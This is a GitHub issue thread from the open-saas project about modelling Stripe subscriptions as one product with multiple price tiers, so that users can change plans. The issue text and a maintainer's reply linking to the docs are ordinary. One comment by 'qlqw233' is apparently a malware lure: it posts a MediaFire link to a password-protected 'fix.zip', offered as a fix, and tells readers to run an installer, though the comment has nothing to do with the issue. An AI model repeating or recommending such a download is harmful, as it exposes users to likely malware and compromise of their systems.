### ISSUE TITLE
Use one product with multiple prices instead of two separate Stripe products for subscription example

### ISSUE THREAD

**Issue by vincanger** [wasp-lang/open-saas#257]
From user isidor on Discord: 
> Hi all, haven't been able to actually test/code with open saas but based on my research the only missing thing in comparison to some premium boilerplates is the management of subscriptions states (e.g. change subscriptions plan) which I believe is crucial. 
Other than that I think this looks like an awesome project, I will come back with more feedback though
> Hello there, I did not yet, for sure will do! But from the UI once you have selected a subscription plan e.g. Hobby you cannot switch to the other subscription type. You can only go to the stripe management page and cancel

This would be solved by creating one subscription product and configuring it to have two price tiers, rather than two separate products with fixed prices, which results in the user having to cancel their subscription and buy a new one.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vincanger** [comment]
The docs already outline how to do this: https://docs.opensaas.sh/guides/stripe-integration/#create-test-products
